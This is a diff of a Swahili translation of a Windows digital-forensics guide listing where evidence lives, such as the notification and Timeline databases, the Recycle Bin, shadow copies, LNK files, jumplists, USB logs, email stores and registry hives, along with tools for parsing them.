||||
|
||||
Katika njia `\Users\<jina_la_mtumiaji>\AppData\Local\Microsoft\Windows\Notifications` unaweza kupata database `appdb.dat` (kabla ya Windows anniversary) au `wpndatabase.db` (baada ya Windows Anniversary).
|
||||
## Vitu vya Kizazi cha Windows
|
||||
|
||||
Ndani ya database hii ya SQLite, unaweza kupata meza ya `Notification` na arifa zote (katika muundo wa XML) ambazo zinaweza kuwa na data muhimu.
|
||||
### Taarifa za Windows 10
|
||||
|
||||
### Timeline
|
||||
Katika njia `\Users\<jina la mtumiaji>\AppData\Local\Microsoft\Windows\Notifications` unaweza kupata database `appdb.dat` (kabla ya Windows anniversary) au `wpndatabase.db` (baada ya Windows Anniversary).
|
||||
|
||||
Timeline ni sifa ya Windows ambayo hutoa **historia ya mfululizo** ya kurasa za wavuti zilizotembelewa, hati zilizohaririwa, na programu zilizotekelezwa.
|
||||
Ndani ya database hii ya SQLite, unaweza kupata meza ya `Notification` na taarifa zote za arifa (katika muundo wa XML) ambazo zinaweza kuwa na data muhimu.
|
||||
|
||||
Database iko katika njia `\Users\<jina_la_mtumiaji>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db`. Database hii inaweza kufunguliwa na chombo cha SQLite au na chombo [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **ambacho huzalisha faili 2 ambazo zinaweza kufunguliwa na chombo** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md).
|
||||
### Muda
|
||||
|
||||
### ADS (Alternate Data Streams)
|
||||
Muda ni sifa ya Windows inayotoa **historia ya mfululizo** ya kurasa za wavuti zilizotembelewa, nyaraka zilizohaririwa, na programu zilizotekelezwa.
|
||||
|
||||
Faili zilizopakuliwa zinaweza kuwa na **ADS Zone.Identifier** inayoonyesha **jinsi** ilivyopakuliwa kutoka kwenye mtandao wa ndani, mtandao, nk. Programu fulani (kama vivinjari) kawaida huweka **habari zaidi** kama vile **URL** ambapo faili ilipakuliwa kutoka.
|
||||
Database iko katika njia `\Users\<jina la mtumiaji>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db`. Database hii inaweza kufunguliwa na zana ya SQLite au na zana [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd) **ambayo inazalisha faili 2 ambazo zinaweza kufunguliwa na zana** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md).
|
||||
|
||||
### ADS (Vijia vya Data Badala)
|
||||
|
||||
Faili zilizopakuliwa zinaweza kuwa na **ADS Zone.Identifier** inayoonyesha **jinsi** ilivyopakuliwa kutoka kwenye mtandao wa ndani, mtandao, n.k. Programu fulani (kama vivinjari) kawaida huingiza **habari zaidi** kama **URL** ambapo faili ilipakuliwa.
|
||||
|
||||
## **Nakala za Faili**
|
||||
|
||||
### Recycle Bin
|
||||
### Bakuli la Takataka
|
||||
|
||||
Katika Vista/Win7/Win8/Win10 **Recycle Bin** inaweza kupatikana kwenye saraka **`$Recycle.bin`** kwenye mizizi ya diski (`C:\$Recycle.bin`).\
|
||||
Wakati faili inafutwa kwenye saraka hii, faili 2 maalum zinaundwa:
|
||||
Katika Vista/Win7/Win8/Win10 **Bakuli la Takataka** linaweza kupatikana katika folda **`$Recycle.bin`** kwenye mizizi ya diski (`C:\$Recycle.bin`).\
|
||||
Wakati faili inapofutwa katika folda hii, faili 2 maalum huzalishwa:
|
||||
|
||||
* `$I{id}`: Taarifa za faili (tarehe ya kufutwa}
|
||||
* `$I{id}`: Taarifa ya faili (tarehe ya wakati ilifutwa}
|
||||
* `$R{id}`: Yaliyomo ya faili
|
||||
|
||||
![](<../../../.gitbook/assets/image (486).png>)
|
||||
|
||||
Ukiwa na faili hizi, unaweza kutumia chombo [**Rifiuti**](https://github.com/abelcheung/rifiuti2) kupata anwani halisi ya faili zilizofutwa na tarehe ambayo ilifutwa (tumia `rifiuti-vista.exe` kwa Vista - Win10).
|
||||
Ukiwa na faili hizi unaweza kutumia zana [**Rifiuti**](https://github.com/abelcheung/rifiuti2) kupata anwani ya asili ya faili zilizofutwa na tarehe iliyofutwa (tumia `rifiuti-vista.exe` kwa Vista – Win10).
|
||||
```
|
||||
.\rifiuti-vista.exe C:\Users\student\Desktop\Recycle
|
||||
```
|
||||
|
@ -54,75 +58,73 @@ Ukiwa na faili hizi, unaweza kutumia chombo [**Rifiuti**](https://github.com/abe
|
|||
|
||||
### Nakala za Kivuli za Kiasi
|
||||
|
||||
Kivuli cha Kiasi ni teknolojia iliyojumuishwa katika Microsoft Windows ambayo inaweza kuunda nakala za **hifadhi** au picha za faili au kiasi cha kompyuta, hata wakati zinatumika.
|
||||
Kivuli cha Nakala ni teknolojia iliyojumuishwa katika Microsoft Windows inayoweza kuunda **nakala za rudufu** au picha za faili au kiasi cha kompyuta, hata wakati zinatumika.
|
||||
|
||||
Nakala hizo za hifadhi kawaida zipo katika `\System Volume Information` kutoka kwenye mizizi ya mfumo wa faili na jina linajumuisha **UIDs** zilizoonyeshwa katika picha ifuatayo:
|
||||
Nakala hizi za rudufu kawaida zinapatikana katika `\System Volume Information` kutoka kwa mzizi wa mfumo wa faili na jina linaundwa na **UIDs** zilizoonyeshwa katika picha ifuatayo:
|
||||
|
||||
![](<../../../.gitbook/assets/image (520).png>)
|
||||
|
||||
Kwa kufunga picha ya uchunguzi na **ArsenalImageMounter**, zana ya [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow\_copy\_view.html) inaweza kutumika kuangalia nakala ya kivuli na hata **kuchambua faili** kutoka kwenye nakala za hifadhi ya kivuli.
|
||||
Kwa kufunga picha ya uchunguzi kwa kutumia **ArsenalImageMounter**, zana [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow\_copy\_view.html) inaweza kutumika kuangalia nakala ya kivuli na hata **kutoa faili** kutoka kwa nakala za rudufu za kivuli.
|
||||
|
||||
![](<../../../.gitbook/assets/image (521).png>)
|
||||
|
||||
Kuingia kwenye usajili `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` kuna faili na funguo **ambazo hazitahifadhiwa**:
|
||||
Kuingia kwa usajili `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\BackupRestore` ina faili na funguo **za kutofanya rudufu**:
|
||||
|
||||
![](<../../../.gitbook/assets/image (522).png>)
|
||||
|
||||
Usajili `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VSS` pia una habari ya usanidi kuhusu `Nakala za Kivuli za Kiasi`.
|
||||
|
||||
### Faili za Kiotomatiki za Ofisi
|
||||
### Faili za Kiotomatiki za Ofisi Zilizohifadhiwa
|
||||
|
||||
Unaweza kupata faili za kiotomatiki za ofisi katika: `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\`
|
||||
Unaweza kupata faili zilizohifadhiwa kiotomatiki za ofisi katika: `C:\Usuarios\\AppData\Roaming\Microsoft{Excel|Word|Powerpoint}\`
|
||||
|
||||
## Vitu vya Shell
|
||||
## Vitu vya Kifaa cha Shell
|
||||
|
||||
Kipengele cha shell ni kipengele ambacho kina habari juu ya jinsi ya kupata faili nyingine.
|
||||
Kipengee cha kifaa cha shell ni kipengee kinachojumuisha habari juu ya jinsi ya kupata faili nyingine.
|
||||
|
||||
### Nyaraka za Hivi Karibuni (LNK)
|
||||
|
||||
Windows **kwa moja kwa moja** **huunda** viungo hivi vya **njia za mkato** wakati mtumiaji **anapofungua, kutumia au kuunda faili** katika:
|
||||
Windows **kwa kiotomatiki** **huunda** hizi **viunganishi** wakati mtumiaji **anapofungua, kutumia au kuunda faili** katika:
|
||||
|
||||
* Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\`
|
||||
* Ofisi: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\`
|
||||
|
||||
Unapounda saraka, kiungo kwa saraka hiyo, kwa saraka ya mzazi, na kwa saraka ya babu pia huundwa.
|
||||
Wakati saraka inapoundwa, kiungo kwa saraka, kwa saraka ya mzazi, na kwa babu wa saraka pia huundwa.
|
||||
|
||||
Faili za kiungo zilizoundwa kiotomatiki hizi **zina habari kuhusu asili** kama ikiwa ni **faili** **au** saraka, **nyakati za MAC** za faili hiyo, **habari ya kiasi** ambapo faili imehifadhiwa, na **saraka ya faili ya lengo**. Habari hii inaweza kuwa na manufaa katika kurejesha faili hizo ikiwa zimeondolewa.
|
||||
Faili hizi za viungo zilizoundwa kiotomatiki **zina habari kuhusu asili** kama ikiwa ni **faili** **au** saraka, **nyakati za MAC** za faili hiyo, **habari ya kiasi** ambapo faili imewekwa na **saraka ya faili ya lengo**. Habari hii inaweza kuwa muhimu kwa kupona faili hizo ikiwa zimeondolewa.
|
||||
|
||||
Pia, **tarehe ya kuundwa ya faili ya kiungo** ni wakati wa kwanza faili ya asili ilipotumiwa **kwa mara ya kwanza** na **tarehe** **iliyobadilishwa** ya faili ya kiungo ni **wakati wa mwisho** faili ya asili iliyotumiwa.
|
||||
Pia, **tarehe ya kuundwa kwa faili ya kiungo** ni **wakati wa kwanza** faili ya asili ilikuwa **imetumiwa kwanza** na **tarehe iliyobadilishwa** ya faili ya kiungo ni **wakati wa mwisho** faili ya asili ilikuwa imeitumiwa.
|
||||
|
||||
Kuangalia faili hizi, unaweza kutumia [**LinkParser**](http://4discovery.com/our-tools/).
|
||||
Kuangalia faili hizi unaweza kutumia [**LinkParser**](http://4discovery.com/our-tools/).
|
||||
|
||||
Katika zana hii utapata **seti 2** za alama za wakati:
|
||||
Katika zana hii utapata **seti 2** za alama za muda:
|
||||
|
||||
* **Seti ya Kwanza:**
|
||||
1. Tarehe ya Kubadilishwa ya Faili
|
||||
2. Tarehe ya Kufikia Faili
|
||||
3. Tarehe ya Kuunda Faili
|
||||
1. Tarehe ya Kubadilishwa kwa Faili
|
||||
2. Tarehe ya Kufikia kwa Faili
|
||||
3. Tarehe ya Kuundwa kwa Faili
|
||||
* **Seti ya Pili:**
|
||||
1. Tarehe ya Kubadilishwa ya Kiungo
|
||||
2. Tarehe ya Kufikia Kiungo
|
||||
3. Tarehe ya Kuunda Kiungo.
|
||||
1. Tarehe ya Kubadilishwa kwa Kiungo
|
||||
2. Tarehe ya Kufikia kwa Kiungo
|
||||
3. Tarehe ya Kuundwa kwa Kiungo.
|
||||
|
||||
Seti ya kwanza ya alama za wakati inahusiana na **alama za wakati za faili yenyewe**. Seti ya pili inahusiana na **alama za wakati za faili iliyolinkishwa**.
|
||||
Seti ya kwanza ya alama za muda inahusiana na **alama za muda za faili yenyewe**. Seti ya pili inahusiana na **alama za muda za faili iliyounganishwa**.
|
||||
|
||||
Unaweza kupata habari sawa kwa kutumia zana ya Windows CLI: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd)
|
||||
```
|
||||
LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
|
||||
```
|
||||
Katika kesi hii, habari itahifadhiwa ndani ya faili ya CSV.
|
||||
|
||||
### Jumplists
|
||||
|
||||
Hizi ni faili za hivi karibuni ambazo zinaonyeshwa kwa kila programu. Ni orodha ya **faili za hivi karibuni zilizotumiwa na programu** ambayo unaweza kufikia kwenye kila programu. Zinaweza kuundwa **kiotomatiki au kuwa desturi**.
|
||||
Hizi ni faili za hivi karibuni zilizoonyeshwa kwa kila programu. Ni orodha ya **faili za hivi karibuni zilizotumiwa na programu** ambayo unaweza kufikia kwenye kila programu. Zinaweza kuundwa **kiotomatiki au kuwa za kawaida**.
|
||||
|
||||
Jumplists zilizoundwa kiotomatiki zimehifadhiwa katika `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. Jumplists zina majina yanayofuata muundo `{id}.autmaticDestinations-ms` ambapo ID ya awali ni ID ya programu.
|
||||
**Jumplists** zilizoundwa kiotomatiki zimehifadhiwa kwenye `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. Jumplists hizo zinaitwa kufuatia muundo `{id}.autmaticDestinations-ms` ambapo ID ya awali ni ID ya programu.
|
||||
|
||||
Jumplists desturi zimehifadhiwa katika `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` na zinaundwa na programu kawaida kwa sababu kitu **muhimu** kimefanyika na faili (labda imepewa alama kama pendwa).
|
||||
Jumplists za kawaida zimehifadhiwa kwenye `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` na huundwa na programu kawaida kwa sababu kitu **muhimu** kimetokea na faili (labda imepewa alama ya kupendwa).
|
||||
|
||||
Muda wa **kuundwa** kwa jumplist yoyote unaonyesha **wakati wa kwanza faili ilipofikiwa** na muda wa **kubadilishwa mara ya mwisho**.
|
||||
**Muda wa kuundwa** wa jumplist yoyote unaonyesha **wakati wa kwanza faili ilipofikiwa** na **muda wa kuhaririwa mara ya mwisho**.
|
||||
|
||||
Unaweza kuangalia jumplists kwa kutumia [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md).
|
||||
Unaweza kukagua jumplists kwa kutumia [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md).
|
||||
|
||||
![](<../../../.gitbook/assets/image (474).png>)
|
||||
|
||||
|
@ -130,96 +132,100 @@ Unaweza kuangalia jumplists kwa kutumia [**JumplistExplorer**](https://ericzimme
|
|||
|
||||
### Shellbags
|
||||
|
||||
[**Fuata kiungo hiki kujifunza ni nini shellbags.**](interesting-windows-registry-keys.md#shellbags)
|
||||
[Tafadhali fuata kiungo hiki kujifunza ni nini shellbags.](interesting-windows-registry-keys.md#shellbags)
|
||||
|
||||
## Matumizi ya USB za Windows
|
||||
|
||||
Inawezekana kutambua kuwa kifaa cha USB kilitumiwa kutokana na uundaji wa:
|
||||
Inawezekana kutambua kuwa kifaa cha USB kilichotumiwa kutokana na uundaji wa:
|
||||
|
||||
* Folda ya Hivi Karibuni ya Windows
|
||||
* Folda ya Hivi Karibuni ya Microsoft Office
|
||||
* Folda za Hivi Karibuni za Windows
|
||||
* Folda za Hivi Karibuni za Microsoft Office
|
||||
* Jumplists
|
||||
|
||||
Tafadhali kumbuka kuwa baadhi ya faili za LNK badala ya kuonyesha njia ya asili, zinaelekeza kwenye folda ya WPDNSE:
|
||||
Tafadhali kumbuka kuwa baadhi ya faili za LNK badala ya kuashiria njia ya asili, zinaashiria kwenye folda ya WPDNSE:
|
||||
|
||||
![](<../../../.gitbook/assets/image (476).png>)
|
||||
|
||||
Faili katika folda ya WPDNSE ni nakala ya faili za asili, kwa hivyo hazitadumu baada ya kuanza upya kwa PC na GUID inachukuliwa kutoka kwa shellbag.
|
||||
Faili katika folda ya WPDNSE ni nakala ya zile za asili, hivyo hazitadumu baada ya kuanzisha upya PC na GUID inachukuliwa kutoka kwa shellbag.
|
||||
|
||||
### Taarifa za Usajili
|
||||
|
||||
[Angalia ukurasa huu ili kujifunza](interesting-windows-registry-keys.md#usb-information) ni funguo gani za usajili zina habari muhimu kuhusu vifaa vilivyounganishwa kupitia USB.
|
||||
[Angalia ukurasa huu kujifunza](interesting-windows-registry-keys.md#usb-information) ni funguo zipi za usajili zina taarifa muhimu kuhusu vifaa vilivyounganishwa vya USB.
|
||||
|
||||
### setupapi
|
||||
|
||||
Angalia faili `C:\Windows\inf\setupapi.dev.log` ili kupata alama za wakati kuhusu wakati uhusiano wa USB ulifanyika (tafuta `Section start`).
|
||||
Angalia faili `C:\Windows\inf\setupapi.dev.log` kupata alama za wakati kuhusu wakati uhusiano wa USB ulifanyika (tafuta `Section start`).
|
||||
|
||||
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
|
||||
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
|
||||
|
||||
### USB Detective
|
||||
|
||||
[**USBDetective**](https://usbdetective.com) inaweza kutumika kupata habari kuhusu vifaa vya USB vilivyowahi kuunganishwa kwenye picha.
|
||||
[**USBDetective**](https://usbdetective.com) inaweza kutumika kupata taarifa kuhusu vifaa vya USB vilivyokuwa vimeunganishwa kwenye picha.
|
||||
|
||||
![](<../../../.gitbook/assets/image (483).png>)
|
||||
|
||||
### Usafi wa Plug and Play
|
||||
### Kusafisha Plug and Play
|
||||
|
||||
Kazi iliyopangwa inayojulikana kama 'Usafi wa Plug and Play' imeundwa kwa kusafisha toleo zilizopitwa na wakati za madereva. Kinyume na madhumuni yake ya kuhifadhi toleo la hivi karibuni la mfuko wa dereva, vyanzo vya mtandaoni vinapendekeza pia inalenga madereva ambayo hayajatumika kwa siku 30. Kwa hivyo, madereva kwa vifaa vinavyoweza kuondolewa ambavyo havijaunganishwa katika siku 30 zinaweza kufutwa.
|
||||
Kazi iliyopangwa inayojulikana kama 'Kusafisha Plug and Play' imeundwa kimsingi kwa ajili ya kuondoa toleo za zamani za madereva. Tofauti na lengo lake lililoelezwa la kuhifadhi toleo la karibuni la pakiti ya dereva, vyanzo vya mtandaoni vinapendekeza pia inalenga madereva ambayo hayajatumika kwa siku 30. Kwa hivyo, madereva kwa vifaa vinavyoweza kuondolewa ambavyo havijakuwa vimeunganishwa katika siku 30 zilizopita zinaweza kuwa chini ya kufutwa.
|
||||
|
||||
Kazi hiyo iko katika njia ifuatayo:
|
||||
Kazi hiyo iko kwenye njia ifuatayo:
|
||||
`C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`.
|
||||
|
||||
Picha inayoonyesha maudhui ya kazi inapatikana:
|
||||
Picha inayoonyesha maudhui ya kazi hiyo imepatikana:
|
||||
![](https://2.bp.blogspot.com/-wqYubtuR_W8/W19bV5S9XyI/AAAAAAAANhU/OHsBDEvjqmg9ayzdNwJ4y2DKZnhCdwSMgCLcBGAs/s1600/xml.png)
|
||||
|
||||
**Vipengele muhimu na Mipangilio ya Kazi:**
|
||||
- **pnpclean.dll**: DLL hii inahusika na mchakato halisi wa usafi.
|
||||
- **UseUnifiedSchedulingEngine**: Imewekwa kuwa `TRUE`, ikionyesha matumizi ya injini ya jumla ya ratiba ya kazi.
|
||||
- **pnpclean.dll**: DLL hii inahusika na mchakato halisi wa kusafisha.
|
||||
- **UseUnifiedSchedulingEngine**: Imewekwa kuwa `TRUE`, ikionyesha matumizi ya injini ya kawaida ya kupangia kazi.
|
||||
- **MaintenanceSettings**:
|
||||
- **Kipindi ('P1M')**: Inaelekeza Meneja wa Kazi kuanzisha kazi ya usafi kila mwezi wakati wa matengenezo ya kiotomatiki ya kawaida.
|
||||
- **Mwisho wa Muda ('P2M')**: Inaagiza Meneja wa Kazi, ikiwa kazi inashindwa kwa miezi miwili mfululizo, kutekeleza kazi wakati wa matengenezo ya dharura ya kiotomatiki.
|
||||
- **Kipindi ('P1M')**: Inaelekeza Meneja wa Kazi kuanzisha kazi ya kusafisha kila mwezi wakati wa matengenezo ya kiotomatiki ya kawaida.
|
||||
- **Mwisho wa Muda ('P2M')**: Inaagiza Meneja wa Kazi, ikiwa kazi itashindwa kwa miezi miwili mfululizo, kutekeleza kazi wakati wa matengenezo ya dharura ya kiotomatiki.
|
||||
|
||||
Usanidi huu unahakikisha matengenezo na usafi wa kawaida wa madereva, na utoaji wa kujaribu tena kazi ikiwa kuna kushindwa mfululizo.
|
||||
Usanidi huu unahakikisha matengenezo ya kawaida na kusafisha ya madereva, na utoaji wa kujaribu tena kazi katika kesi ya kushindwa mfululizo.
|
||||
|
||||
**Kwa habari zaidi angalia:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html)
|
||||
|
||||
## Barua pepe
|
||||
|
||||
Barua pepe zina sehemu **2 za kuvutia: Vichwa na maudhui** ya barua pepe. Katika **vichwa** unaweza kupata habari kama:
|
||||
Barua pepe zina sehemu **2 za kuvutia: Vichwa vya habari na maudhui** ya barua pepe. Katika **vichwa vya habari** unaweza kupata habari kama:
|
||||
|
||||
* **Nani** alituma barua pepe (anwani ya barua pepe, IP, seva za barua pepe ambazo zimeelekeza barua pepe)
|
||||
* **Lini** barua pepe iliyotumwa
|
||||
* **Lini** barua pepe ilitumwa
|
||||
|
||||
Pia, ndani ya vichwa vya `References` na `In-Reply-To` unaweza kupata kitambulisho cha ujumbe:
|
||||
Pia, ndani ya vichwa vya habari vya `References` na `In-Reply-To` unaweza kupata ID za ujumbe:
|
||||
|
||||
![](<../../../.gitbook/assets/image (484).png>)
|
||||
|
||||
### Programu ya Barua pepe ya Windows
|
||||
|
||||
Programu hii inahifadhi barua pepe katika HTML au maandishi. Unaweza kupata barua pepe ndani ya folda za ndani za `\Users\<username>\AppData\Local\Comms\Unistore\data\3\`. Barua pepe zimehifadhiwa na kipengee cha `.dat`.
|
||||
Programu hii huihifadhi barua pepe kwa HTML au maandishi. Unaweza kupata barua pepe ndani ya vijisehemu ndani ya `\Users\<username>\AppData\Local\Comms\Unistore\data\3\`. Barua pepe zimehifadhiwa kwa kipengele cha `.dat`.
|
||||
|
||||
**Metadata** ya barua pepe na **mawasiliano** yanaweza kupatikana ndani ya **database ya EDB**: `\Users\<username>\AppData\Local\Comms\UnistoreDB\store.vol`
|
||||
|
||||
**Badilisha kipengee** cha faili kutoka `.vol` hadi `.edb` na unaweza kutumia zana [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) kuifungua. Ndani ya meza ya `Message` unaweza kuona barua pepe.
|
||||
**Badilisha kipengele** cha faili kutoka `.vol` hadi `.edb` na unaweza kutumia zana [ESEDatabaseView](https://www.nirsoft.net/utils/ese\_database\_view.html) kuifungua. Ndani ya meza ya `Message` unaweza kuona barua pepe.
|
||||
|
||||
### Microsoft Outlook
|
||||
|
||||
Wakati seva za Exchange au wateja wa Outlook wanapotumika, kutakuwa na vichwa vya MAPI:
|
||||
Wakati seva za Exchange au wateja wa Outlook wanapotumika kutakuwa na vichwa vya MAPI:
|
||||
|
||||
* `Mapi-Client-Submit-Time`: Wakati wa mfumo wakati barua pepe iliyotumwa
|
||||
* `Mapi-Conversation-Index`: Idadi ya ujumbe wa watoto wa mazungumzo na alama ya wakati ya kila ujumbe wa mazungumzo
|
||||
* `Mapi-Client-Submit-Time`: Wakati wa mfumo wakati barua pepe ilipotumwa
|
||||
* `Mapi-Conversation-Index`: Idadi ya ujumbe wa watoto wa mjadala na alama ya wakati ya kila ujumbe wa mjadala
|
||||
* `Mapi-Entry-ID`: Kitambulisho cha ujumbe.
|
||||
* `Mappi-Message-Flags` na `Pr_last_Verb-Executed`: Habari kuhusu mteja wa MAPI (ujumbe umesomwa? haujasomwa? umesasishwa? umeelekezwa? nje ya ofisi?)
|
||||
* `Mappi-Message-Flags` na `Pr_last_Verb-Executed`: Taarifa kuhusu mteja wa MAPI (ujumbe umesomwa? haujasomwa? umejibiwa? umepelekwa upya? nje ya ofisi?)
|
||||
|
||||
Katika mteja wa Microsoft Outlook, ujumbe wote uliotumwa/ulipopokelewa, data ya mawasiliano, na data ya kalenda zimehifadhiwa katika faili ya PST katika:
|
||||
Katika mteja wa Microsoft Outlook, ujumbe uliotumwa/kupokelewa, data za mawasiliano, na data ya kalenda zimehifadhiwa kwenye faili ya PST katika:
|
||||
|
||||
* `%USERPROFILE%\Local Settings\Application Data\Microsoft\Outlook` (WinXP)
|
||||
* `%USERPROFILE%\AppData\Local\Microsoft\Outlook`
|
||||
|
||||
Njia ya usajili `HKEY_CURRENT_USER\Software\Microsoft\WindowsNT
|
||||
Njia ya usajili `HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook` inaonyesha faili inayotumiwa.
|
||||
|
||||
Unaweza kufungua faili ya PST kwa kutumia zana [**Kernel PST Viewer**](https://www.nucleustechnologies.com/es/visor-de-pst.html).
|
||||
|
||||
![](<../../../.gitbook/assets/image (485).png>)
|
||||
### Faili za Microsoft Outlook OST
|
||||
|
||||
Faili ya **OST** inazalishwa na Microsoft Outlook wakati inapowekwa na **IMAP** au seva ya **Exchange**, ikihifadhi habari sawa na faili ya PST. Faili hii inasawazishwa na seva, ikihifadhi data kwa **miezi 12 iliyopita** hadi **ukubwa wa juu wa 50GB**, na iko katika saraka ile ile na faili ya PST. Ili kuona faili ya OST, [**Mtazamaji wa OST wa Kernel**](https://www.nucleustechnologies.com/ost-viewer.html) inaweza kutumika.
|
||||
Faili ya **OST** inazalishwa na Microsoft Outlook wakati inaundwa na **IMAP** au seva ya **Exchange**, ikihifadhi habari sawa na faili ya PST. Faili hii inasawazishwa na seva, ikihifadhi data kwa **miezi 12 iliyopita** hadi **ukubwa wa juu wa 50GB**, na iko katika saraka ile ile na faili ya PST. Ili kuona faili ya OST, [**Mtazamaji wa OST wa Kernel**](https://www.nucleustechnologies.com/ost-viewer.html) inaweza kutumika.
|
||||
|
||||
### Kupata Viambatisho
|
||||
|
||||
|
@ -230,47 +236,47 @@ Viambatisho vilivyopotea vinaweza kupatikana kutoka:
|
|||
|
||||
### Faili za Thunderbird MBOX
|
||||
|
||||
**Thunderbird** hutumia faili za **MBOX** kuhifadhi data, zilizoko katika `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`.
|
||||
**Thunderbird** hutumia faili za **MBOX** kuhifadhi data, zilizoko kwenye `\Users\%USERNAME%\AppData\Roaming\Thunderbird\Profiles`.
|
||||
|
||||
### Vielelezo vya Picha
|
||||
|
||||
- **Windows XP na 8-8.1**: Kufikia saraka na vielelezo huzalisha faili ya `thumbs.db` inayohifadhi hakikisho za picha, hata baada ya kufutwa.
|
||||
- **Windows 7/10**: `thumbs.db` inaundwa wakati inafikiwa kupitia mtandao kupitia njia ya UNC.
|
||||
- **Windows Vista na toleo jipya**: Hakikisho za vielelezo vimehifadhiwa katika `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` na faili zinaitwa **thumbcache\_xxx.db**. [**Thumbsviewer**](https://thumbsviewer.github.io) na [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) ni zana za kuona faili hizi.
|
||||
- **Windows 7/10**: `thumbs.db` inaundwa wakati inafikiwa kwa mtandao kupitia njia ya UNC.
|
||||
- **Windows Vista na mpya**: Hakikisho za vielelezo zimejumuishwa katika `%userprofile%\AppData\Local\Microsoft\Windows\Explorer` na faili zinaitwa **thumbcache\_xxx.db**. [**Thumbsviewer**](https://thumbsviewer.github.io) na [**ThumbCache Viewer**](https://thumbcacheviewer.github.io) ni zana za kuona faili hizi.
|
||||
|
||||
### Habari za Usajili wa Windows
|
||||
### Taarifa za Usajili wa Windows
|
||||
|
||||
Usajili wa Windows, ukihifadhi data kubwa ya shughuli za mfumo na mtumiaji, inapatikana katika faili zifuatazo:
|
||||
Usajili wa Windows, ukihifadhi data kubwa ya shughuli za mfumo na mtumiaji, imejumuishwa katika faili zifuatazo:
|
||||
|
||||
- `%windir%\System32\Config` kwa funguo za chini za `HKEY_LOCAL_MACHINE`.
|
||||
- `%windir%\System32\Config` kwa funguo za chini za `HKEY_LOCAL_MACHINE` mbalimbali.
|
||||
- `%UserProfile%{User}\NTUSER.DAT` kwa `HKEY_CURRENT_USER`.
|
||||
- Windows Vista na toleo jipya hufanya nakala rudufu ya faili za usajili za `HKEY_LOCAL_MACHINE` katika `%Windir%\System32\Config\RegBack\`.
|
||||
- Kwa kuongezea, habari za utekelezaji wa programu zimehifadhiwa katika `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` kuanzia Windows Vista na Windows 2008 Server.
|
||||
- Windows Vista na toleo jipya hufanya nakala za faili za usajili za `HKEY_LOCAL_MACHINE` katika `%Windir%\System32\Config\RegBack\`.
|
||||
- Aidha, taarifa za utekelezaji wa programu zimehifadhiwa katika `%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT` kutoka Windows Vista na Windows 2008 Server kuendelea.
|
||||
|
||||
### Zana
|
||||
|
||||
Baadhi ya zana ni muhimu kuchambua faili za usajili:
|
||||
|
||||
* **Mhariri wa Usajili**: Imewekwa katika Windows. Ni kiolesura cha GUI cha kupitia usajili wa Windows wa kikao cha sasa.
|
||||
* [**Mchunguzi wa Usajili**](https://ericzimmerman.github.io/#!index.md): Inakuwezesha kupakia faili ya usajili na kuzunguka kupitia hiyo kwa kutumia GUI. Pia ina Vialamisho vinavyobainisha funguo zenye habari muhimu.
|
||||
* [**RegRipper**](https://github.com/keydet89/RegRipper3.0): Tena, ina GUI inayoruhusu kuzunguka kupitia usajili uliopakiwa na pia ina programu-jalizi ambazo zinaonyesha habari muhimu ndani ya usajili uliopakiwa.
|
||||
* [**Windows Registry Recovery**](https://www.mitec.cz/wrr.html): Programu nyingine ya GUI inayoweza kuchambua habari muhimu kutoka kwa usajili uliopakiwa.
|
||||
* **Mhariri wa Usajili**: Imeboreshwa kwenye Windows. Ni GUI ya kutembea kupitia usajili wa Windows wa kikao cha sasa.
|
||||
* [**Mchunguzi wa Usajili**](https://ericzimmerman.github.io/#!index.md): Inakuruhusu kupakia faili ya usajili na kutembea kupitia hiyo kwa GUI. Pia ina Vialamisho vinavyoonyesha funguo zenye habari muhimu.
|
||||
